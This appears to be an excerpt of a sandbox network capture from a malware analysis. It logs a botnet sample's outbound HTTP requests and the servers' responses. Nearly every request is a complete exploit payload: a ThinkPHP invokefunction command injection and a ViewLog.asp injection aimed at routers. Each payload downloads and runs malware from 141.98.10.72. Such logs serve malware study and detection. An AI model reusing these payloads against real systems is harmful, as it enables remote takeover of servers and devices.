                                                      Feb 14, 2024 09:30:48.297167063 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:30:48 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:48 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 64 31 66 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 34 38 26 23 34 36 3b 66 62 36 62 38 61 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;ad1f1602&#46;1707899448&#46;fb6b8a0</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      854192.168.2.155283295.86.81.6080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:48.149471998 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      855192.168.2.153884895.59.243.12980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:48.161309004 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:48.435421944 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:30:48.435678959 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      856192.168.2.155162895.101.175.21380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:48.297254086 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:48.499252081 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:48 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:48 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 36 64 65 34 35 36 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 34 38 26 23 34 36 3b 32 66 64 66 66 64 30 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;46de4568&#46;1707899448&#46;2fdffd0f</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      857192.168.2.154297295.216.115.16880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:48.373876095 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:48.598457098 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.18.0
                                                      Date: Wed, 14 Feb 2024 08:30:48 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      858192.168.2.153627095.85.210.22480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:48.374166012 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      859192.168.2.154375495.216.124.14680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:48.383690119 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:48.618251085 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:48 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      860192.168.2.154762095.57.101.21480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:48.588020086 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:48.879575014 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:30:48.881413937 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      861192.168.2.155833045.201.246.17723
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:48.880320072 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:48Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      862192.168.2.154554494.242.230.598080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:49.211416960 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      863192.168.2.155838445.201.246.17723
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:49.359352112 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:49Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      864192.168.2.155135031.136.3.1768080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:49.550522089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:50.231786966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:51.575741053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:54.359736919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:59.735518932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:10.487227917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:32.502583027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:15.509438038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      865192.168.2.155167495.101.175.21380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.097654104 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:50.299680948 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:50 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:50 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 36 64 65 34 35 36 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 30 26 23 34 36 3b 32 66 65 30 30 34 33 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;46de4568&#46;1707899450&#46;2fe0043a</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      866192.168.2.154508295.214.144.2038080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.329396963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      867192.168.2.155050895.97.109.1658080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.329463959 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:50.546037912 CET626INHTTP/1.1 404
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 431
                                                      Date: Wed, 14 Feb 2024 08:30:50 GMT
                                                      Keep-Alive: timeout=5
                                                      Connection: keep-alive
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      868192.168.2.154771495.100.245.13180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.491497993 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
